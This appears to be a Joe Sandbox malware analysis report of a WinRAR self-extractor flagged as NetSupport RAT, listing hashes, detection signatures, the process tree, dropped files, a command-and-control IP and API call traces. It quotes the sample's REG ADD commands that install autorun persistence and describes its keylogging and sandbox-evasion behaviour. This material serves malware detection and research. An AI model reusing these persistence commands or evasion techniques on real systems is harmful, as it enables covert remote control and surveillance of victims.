Edit tour

Windows Analysis Report
d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Overview

General Information

Sample name:	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Analysis ID:	1580475
MD5:	47cfce938a71540a2039aebd5abe0783
SHA1:	641d20b31f5b2aba11746d1e533cbe4d4ee9c6ed
SHA256:	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d582b6d0b6f188306954
Tags:	exeNetSupportuser-abuse_ch
Infos:

Detection

NetSupport RAT

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Delayed program exit found

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Uses cmd line tools excessively to alter registry or file data

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Process Tree

System is w10x64

d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe (PID: 1100 cmdline: "C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe" MD5: 47CFCE938A71540A2039AEBD5ABE0783)

cmd.exe (PID: 6508 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7184 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 7204 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

bild.exe (PID: 7216 cmdline: C:\Users\Public\Netstat\bild.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)

bild.exe (PID: 7388 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)

bild.exe (PID: 7612 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)

bild.exe (PID: 7688 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\Public\Netstat\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\bild.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\Public\Netstat\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\Public\Netstat\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2325321884.0000000000A52000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000000.2053735718.0000000000A52000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000009.00000000.2241928402.0000000000A52000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000000.2323620387.0000000000A52000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 1100	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 1100	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: bild.exe PID: 7216	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: bild.exe PID: 7216	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: bild.exe PID: 7388	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: bild.exe PID: 7388	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: bild.exe PID: 7612	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: bild.exe PID: 7612	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: bild.exe PID: 7688	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: bild.exe PID: 7688	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author
10.2.bild.exe.6cee0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.0.bild.exe.a50000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.2.bild.exe.a50000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.bild.exe.a50000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.bild.exe.6e350000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.bild.exe.6e350000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.bild.exe.a50000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.bild.exe.6e350000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.2.bild.exe.6e350000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.bild.exe.a50000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.0.bild.exe.a50000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.bild.exe.111b79e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.bild.exe.111b79e0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.bild.exe.111b79e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.bild.exe.111b79e0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.4fbb800.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.4fbb800.0.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.2.bild.exe.6cee0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.bild.exe.6c5d0000.3.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.0.bild.exe.a50000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.bild.exe.111b79e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.bild.exe.111b79e0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.bild.exe.6cee0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.0.bild.exe.a50000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.bild.exe.6cee0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.2.bild.exe.111b79e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.bild.exe.111b79e0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.bild.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.bild.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.bild.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.bild.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
9.2.bild.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.bild.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.bild.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.bild.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 30 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Netstat\bild.exe, CommandLine: C:\Users\Public\Netstat\bild.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\bild.exe, NewProcessName: C:\Users\Public\Netstat\bild.exe, OriginalFileName: C:\Users\Public\Netstat\bild.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6508, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\bild.exe, ProcessId: 7216, ProcessName: bild.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.76.253.210, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\bild.exe, Initiated: true, ProcessId: 7216, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6508, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", ProcessId: 7184, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6508, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", ProcessId: 7184, ProcessName: reg.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7204, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Netstat

Suricata Signatures

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T17:47:45.194573+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.5	49704	45.76.253.210	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Netstat\bild.exe	ReversingLabs: Detection: 28%
Source: C:\Users\Public\Netstat\remcmdstub.exe	ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		6_2_110AD570
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		7_2_110AD570

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

File opened: C:\Users\Public\Netstat\msvcr100.dll

Jump to behavior

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Source:	Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000006.00000002.3900156283.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000007.00000002.2164341754.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.2252286300.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000A.00000002.2326094910.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000006.00000002.3900362528.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000007.00000002.2164541647.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.2252520628.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000A.00000002.2326293538.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000000.2053735718.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.2241928402.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000002.2325321884.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000000.2323620387.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000006.00000002.3900285407.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000007.00000002.2164476357.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.2252435927.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000A.00000002.2326221599.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003CA273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_003CA273
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DA537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_003DA537
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003E7D78 FindFirstFileExA,	0_2_003E7D78
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102D330
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11065890
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_1106A0A0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111266E0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_1110AFD0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	7_2_1102D330
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	7_2_11065890
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	7_2_1106A0A0
